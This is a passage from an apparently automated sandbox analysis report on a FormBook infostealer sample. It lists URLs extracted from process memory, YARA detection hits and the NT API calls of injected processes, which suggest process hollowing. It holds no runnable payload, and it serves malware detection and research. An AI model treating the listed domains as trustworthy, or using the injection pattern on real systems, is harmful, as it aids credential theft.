                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.supercanal.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.swisshemp.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taffix.net/binding
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taquzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.taquzhibo.net/binding
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thebossclub.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theflowerpot.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thisit.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.urbanscout.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wanyuezhibo.net
                Source: nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.workandhealth.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuhaozhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xianglizhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaokongzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaoyingzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingyezhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xishizhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiuchangzhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiulizhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiumozhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiupazhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiyezhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xuetuzhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yecaozhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yechuizhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yewuzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueguangzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yumba.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundouzhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundouzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yurenzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zeeshop.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3314587680.0000000006652000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.00000000042A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000600A000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000003C5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                Source: qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                Source: svchost.exe, 00000011.00000003.1203275073.0000018565060000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: EhStorAuthn.exe, 0000000F.00000003.1278283817.000000000853D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: 0t7MXNEfCg.exe, HrovwwypYVlFWB.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1094905703.00000000044D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3313869495.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3313912525.0000000005FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0163951C NtQueryInformationProcess,0_2_0163951C
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01639AE8 NtQueryInformationProcess,0_2_01639AE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042C763 NtClose,7_2_0042C763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2B60 NtClose,LdrInitializeThunk,7_2_00EF2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00EF2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_00EF2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF35C0 NtCreateMutant,LdrInitializeThunk,7_2_00EF35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF4340 NtSetContextThread,7_2_00EF4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF4650 NtSuspendThread,7_2_00EF4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2AF0 NtWriteFile,7_2_00EF2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2AD0 NtReadFile,7_2_00EF2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2AB0 NtWaitForSingleObject,7_2_00EF2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2BE0 NtQueryValueKey,7_2_00EF2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2BF0 NtAllocateVirtualMemory,7_2_00EF2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2BA0 NtEnumerateValueKey,7_2_00EF2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2B80 NtQueryInformationFile,7_2_00EF2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2CF0 NtOpenProcess,7_2_00EF2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2CC0 NtQueryVirtualMemory,7_2_00EF2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2CA0 NtQueryInformationToken,7_2_00EF2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2C60 NtCreateKey,7_2_00EF2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2C00 NtQueryInformationProcess,7_2_00EF2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2DD0 NtDelayExecution,7_2_00EF2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2DB0 NtEnumerateKey,7_2_00EF2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2D30 NtUnmapViewOfSection,7_2_00EF2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2D00 NtSetInformationFile,7_2_00EF2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2D10 NtMapViewOfSection,7_2_00EF2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2EE0 NtQueueApcThread,7_2_00EF2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2EA0 NtAdjustPrivilegesToken,7_2_00EF2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2E80 NtReadVirtualMemory,7_2_00EF2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2E30 NtWriteVirtualMemory,7_2_00EF2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2FE0 NtCreateFile,7_2_00EF2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2FA0 NtQuerySection,7_2_00EF2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2FB0 NtResumeThread,7_2_00EF2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2F90 NtProtectVirtualMemory,7_2_00EF2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2F60 NtCreateProcessEx,7_2_00EF2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2F30 NtCreateSection,7_2_00EF2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF3090 NtSetValueKey,7_2_00EF3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF3010 NtOpenDirectoryObject,7_2_00EF3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF39B0 NtGetContextThread,7_2_00EF39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF3D70 NtOpenThread,7_2_00EF3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF3D10 NtOpenProcessToken,7_2_00EF3D10
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0190951C NtQueryInformationProcess,8_2_0190951C
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_01909AE8 NtQueryInformationProcess,8_2_01909AE8
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016308E90_2_016308E9
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016313700_2_01631370
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016383590_2_01638359
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01631B800_2_01631B80
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016315F00_2_016315F0
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016325F00_2_016325F0
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016334600_2_01633460
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01639E100_2_01639E10
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016359F80_2_016359F8
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016351B00_2_016351B0
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016398E10_2_016398E1
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016313410_2_01631341
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01638BF40_2_01638BF4
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01635BD80_2_01635BD8
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01635A080_2_01635A08
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016355400_2_01635540
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016355500_2_01635550
